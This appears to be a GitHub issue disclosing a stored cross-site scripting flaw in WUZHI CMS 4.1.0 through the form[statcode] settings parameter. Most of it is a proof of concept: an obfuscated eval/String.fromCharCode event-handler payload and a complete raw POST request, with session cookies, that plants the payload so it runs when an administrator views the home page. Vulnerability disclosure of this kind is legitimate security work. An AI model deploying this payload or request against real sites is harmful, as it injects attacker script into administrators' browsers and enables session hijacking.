Open
Description
Vulnerability description
A xss vulnerability was discovered in WUZHI CMS 4.1.0
There is a persistent XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML via the form[statcode] parameter post to the /wuzhicms/www//index.php?m=core&f=set&v=basic&_menuid=22&_su=wuzhicms
poc
xss payload:<details/open/ontoggle=eval(String.fromCharCode(97)+String.fromCharCode(108)+String.fromCharCode(101)+String.fromCharCode(114)+String.fromCharCode(116)+String.fromCharCode(40)+String.fromCharCode(50)+String.fromCharCode(41))>
Vulnerability trigger point
POST /index.php?m=core&f=set&v=basic&_menuid=22&_su=wuzhicms HTTP/1.1
Host: wuzhicms.jas0nwhy.top
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://wuzhicms.jas0nwhy.top/index.php?m=core&f=set&v=basic&_menuid=22&_su=wuzhicms
Content-Type: application/x-www-form-urlencoded
Content-Length: 885
Cookie: uFF_qkey=OL%2FPYWtPocjUysJ4eGv17OtY2yAFbrhi; uFF_truename=test; uFF_auth=v%2B5dKnQ11JePhw%2FSGWmMAfDyiW6dNpSOA6SqEty0kRwKW3G%2B6BcsRkJNPpYfUHI73dbdRX9ED02vJTVLfTMoUM9ubgPIlGi3oeDySn4fwUllsGN68ZKsIg%3D%3D; uFF__uid=uxA4c2PBBY82ZXh9mKvwfA%3D%3D; uFF__username=qmwWA1qdk4cLcHywp%2FpCTA%3D%3D; uFF__groupid=kTmiMGl374drFAogceF61w%3D%3D; uFF_modelid=10; uFF_search_cookie=hiIS00B0niHSbqcNh80buiJrVtKUEeTzMtMTtI4hsL2eb7T7a6i5Zk8YNhUcZQgjGWkuSpy2Ae8%3D; PHPSESSID=3nmql0bilkvr1ggiv4ls5j3bd0; uFF_uid=M3HRuLTTk0YN0EMJEsyodQ%3D%3D; uFF_username=aYPt3Efwbdqjo1iqCRUoYA%3D%3D; uFF_wz_name=gRUcj4a9fqr9gfoB2p24hA%3D%3D; uFF_siteid=zs4amrXx%2Bfkw9jT79BFwjA%3D%3D
Connection: keep-alive
Upgrade-Insecure-Requests: 1
form%5Bsitename%5D=test&form%5Bseo_keywords%5D=test&form%5Bseo_description%5D=&weburl=http%3A%2F%2Fwuzhicms.jas0nwhy.top%2F&form%5Blogo%5D=&form%5Blogo2%5D=&form%5Bcopyright%5D=Copyright+%C2%A9+2017+%E5%8C%97%E4%BA%AC%E4%BA%94%E6%8C%87%E4%BA%92%E8%81%94%E7%A7%91%E6%8A%80%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8+All+Rights+Reserved%3Cbr%3E%E4%BA%ACICP%E5%A4%8714036160%E5%8F%B7-1&form%5Bstatcode%5D=%3Cdetails%2Fopen%2Fontoggle%3Deval%28String.fromCharCode%2897%29%2BString.fromCharCode%28108%29%2BString.fromCharCode%28101%29%2BString.fromCharCode%28114%29%2BString.fromCharCode%28116%29%2BString.fromCharCode%2840%29%2BString.fromCharCode%2850%29%2BString.fromCharCode%2841%29%29%3E&form%5Baccess_authority%5D=0&form%5Bclose%5D=0&form%5Bclose_reason%5D=%E7%AB%99%E7%82%B9%E5%8D%87%E7%BA%A7%E4%B8%AD%EF%BC%8C%E8%AF%B7%E7%A8%8D%E5%90%8E%E8%AE%BF%E9%97%AE%EF%BC%81&submit=%E6%8F%90%E4%BA%A4
When an administrator accesses the CMS home page, it triggers a XSS vulnerability
Metadata
Metadata
Assignees
Labels
No labels